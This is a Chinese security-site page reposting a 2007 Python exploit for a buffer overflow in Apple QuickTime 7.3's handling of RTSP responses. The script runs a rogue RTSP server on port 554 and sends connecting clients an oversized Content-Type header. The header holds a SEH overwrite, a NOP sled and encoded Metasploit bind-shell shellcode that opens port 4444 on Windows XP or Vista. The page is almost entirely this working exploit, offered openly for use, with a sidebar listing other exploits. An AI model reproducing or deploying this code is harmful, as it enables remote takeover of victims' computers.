首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Apple QuickTime 7.3 RTSP Response Universal Exploit (Vista / XP) 来源：http://www.offensive-security.com 作者：muts 发布时间：2007-11-26   #!/usr/bin/python # Apple QuickTime 7.3 RTSP Response Vista / XPSP2 Universal # Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> # Edited by muts -> offensive-security.com # http://www.offensive-security.com # # Tested on XP SP2 and Vista EN QuickTime/7.3 # from socket import * header = ( 'RTSP/1.0 200 OK\r\n' 'CSeq: 1\r\n' 'Date: 0x00 :P\r\n' 'Content-Base: rtsp://0.0.0.0/1.mp3/\r\n' 'Content-Type: %s\r\n' # <-- overflow 'Content-Length: %d\r\n' '\r\n') body = ( 'v=0\r\n' 'o=- 16689332712 1 IN IP4 0.0.0.0\r\n' 's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'i=1.mp3\r\n' 't=0 0\r\n' 'a=tool:ciamciaramcia\r\n' 'a=type:broadcast\r\n' 'a=control:*\r\n' 'a=range:npt=0-213.077\r\n' 'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.O\r\n' 'a=x-qt-text-inf:1.mp3\r\n' 'm=audio 0 RTP/AVP 14\r\n' 'c=IN IP4 0.0.0.0\r\n' 'a=control:track1\r\n' ) # win32_bind -  EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */ shellcode =("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x48\x49\x49\x49" "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x69" "\x58\x50\x30\x41\x31\x41\x42\x6b\x42\x41\x79\x32\x42\x42\x32\x41" "\x41\x42\x30\x41\x41\x58\x38\x42\x42\x50\x75\x39\x79\x4b\x4c\x51" "\x7a\x5a\x4b\x32\x6d\x38\x68\x48\x79\x4b\x4f\x6b\x4f\x4b\x4f\x75" "\x30\x4e\x6b\x30\x6c\x36\x44\x56\x44\x4c\x4b\x57\x35\x77\x4c\x6e" "\x6b\x41\x6c\x76\x65\x50\x78\x34\x41\x58\x6f\x4e\x6b\x70\x4f\x54" "\x58\x6e\x6b\x33\x6f\x71\x30\x64\x41\x48\x6b\x43\x79\x6e\x6b\x67" "\x44\x4e\x6b\x46\x61\x7a\x4e\x64\x71\x4f\x30\x7a\x39\x4c\x6c\x4b" "\x34\x4b\x70\x50\x74\x57\x77\x48\x41\x79\x5a\x46\x6d\x66\x61\x6f" "\x32\x48\x6b\x79\x64\x57\x4b\x36\x34\x45\x74\x34\x68\x74\x35\x4d" "\x35\x4e\x6b\x71\x4f\x77\x54\x53\x31\x6a\x4b\x65\x36\x4c\x4b\x76" "\x6c\x52\x6b\x4c\x4b\x33\x6f\x37\x6c\x75\x51\x5a\x4b\x47\x73\x34" "\x6c\x4e\x6b\x4d\x59\x50\x6c\x44\x64\x75\x4c\x30\x61\x68\x43\x46" "\x51\x6b\x6b\x62\x44\x6e\x6b\x70\x43\x74\x70\x6e\x6b\x71\x50\x66" "\x6c\x4e\x6b\x32\x50\x57\x6c\x4e\x4d\x4c\x4b\x41\x50\x73\x38\x53" "\x6e\x53\x58\x6c\x4e\x30\x4e\x64\x4e\x48\x6c\x76\x30\x4b\x4f\x6b" "\x66\x35\x36\x50\x53\x43\x56\x43\x58\x57\x43\x30\x32\x51\x78\x53" "\x47\x62\x53\x74\x72\x41\x4f\x41\x44\x4b\x4f\x6a\x70\x43\x58\x48" "\x4b\x48\x6d\x4b\x4c\x35\x6b\x52\x70\x59\x6f\x38\x56\x41\x4f\x6d" "\x59\x4a\x45\x61\x76\x4e\x61\x6a\x4d\x47\x78\x76\x62\x50\x55\x62" "\x4a\x63\x32\x6b\x4f\x6e\x30\x61\x78\x4e\x39\x44\x49\x7a\x55\x4c" "\x6d\x30\x57\x39\x6f\x4e\x36\x61\x43\x71\x43\x51\x43\x73\x63\x56" "\x33\x73\x73\x66\x33\x73\x73\x61\x43\x79\x6f\x7a\x70\x70\x66\x65" "\x38\x76\x71\x51\x4c\x43\x56\x36\x33\x4b\x39\x4a\x41\x4d\x45\x31" "\x78\x39\x34\x47\x6a\x70\x70\x4a\x67\x33\x67\x6b\x4f\x4b\x66\x30" "\x6a\x62\x30\x70\x51\x66\x35\x4b\x4f\x7a\x70\x35\x38\x4e\x44\x6e" "\x4d\x54\x6e\x5a\x49\x66\x37\x49\x6f\x6b\x66\x73\x63\x70\x55\x6b" "\x4f\x6a\x70\x65\x38\x5a\x45\x30\x49\x4d\x56\x47\x39\x31\x47\x39" "\x6f\x4e\x36\x52\x70\x53\x64\x62\x74\x76\x35\x59\x6f\x58\x50\x4e" "\x73\x61\x78\x6b\x57\x73\x49\x4b\x76\x43\x49\x63\x67\x4b\x4f\x59" "\x46\x70\x55\x4b\x4f\x4a\x70\x50\x66\x72\x4a\x31\x74\x43\x56\x41" "\x78\x50\x63\x62\x4d\x6f\x79\x48\x65\x33\x5a\x72\x70\x30\x59\x71" "\x39\x68\x4c\x6d\x59\x48\x67\x61\x7a\x43\x74\x6d\x59\x4d\x32\x64" "\x71\x4f\x30\x4c\x33\x4d\x7a\x4b\x4e\x51\x52\x36\x4d\x6b\x4e\x41" "\x52\x64\x6c\x4a\x33\x6e\x6d\x31\x6a\x45\x68\x4e\x4b\x6e\x4b\x4e" "\x4b\x61\x78\x44\x32\x49\x6e\x4c\x73\x66\x76\x39\x6f\x50\x75\x51" "\x54\x49\x6f\x49\x46\x31\x4b\x31\x47\x70\x52\x46\x31\x70\x51\x46" "\x31\x52\x4a\x47\x71\x43\x61\x62\x71\x53\x65\x36\x31\x79\x6f\x5a" "\x70\x33\x58\x4c\x6d\x7a\x79\x45\x55\x6a\x6e\x76\x33\x59\x6f\x6a" "\x76\x50\x6a\x4b\x4f\x79\x6f\x50\x37\x59\x6f\x7a\x70\x4c\x4b\x52" "\x77\x4b\x4c\x4f\x73\x49\x54\x35\x34\x79\x6f\x6b\x66\x51\x42\x59" "\x6f\x38\x50\x30\x68\x5a\x50\x4c\x4a\x66\x64\x51\x4f\x36\x33\x4b" "\x4f\x78\x56\x6b\x4f\x38\x50\x69") tmp = "A" * 991 tmp+= "\xeb\x32\x90\x90" tmp+= "\xC8\xF3\x86\x66" # 6686F3C8 tmp+= "\x90" * 64 tmp+= shellcode tmp+= "\x41"* int(4028-len(shellcode)) header %= (tmp, len(body)) evil = header + body s = socket(AF_INET, SOCK_STREAM) s.bind(("0.0.0.0", 554)) s.listen(1) print "[+] Listening on [RTSP] 554" c, addr = s.accept() print "[+] Connection accepted from: %s" % (addr[0]) data=c.recv(1024) c.send(evil) raw_input("[+] Done, press enter to quit") c.close() s.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·PBLang <= 4.99.17.q Remote Fil ·RunCMS <= 1.6 disclaimer.php R ·Apple Quicktime 7.2/7.3 (RSTP ·Softbiz Freelancers Script v.1 ·PHPKIT 1.6.4pl1 article.php Re ·VigileCMS <= 1.8 Stealth Remot ·Sciurus Hosting Panel Remote C ·IceBB 1.0-rc6 Remote Database ·DeluxeBB <= 1.09 Remote Admin ·Apple Mac OS X 10.4.x Kernel i ·警告!暴风影音3.7.11.13 爆远程 ·迅雷5又（这次怎么多了一个又字   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved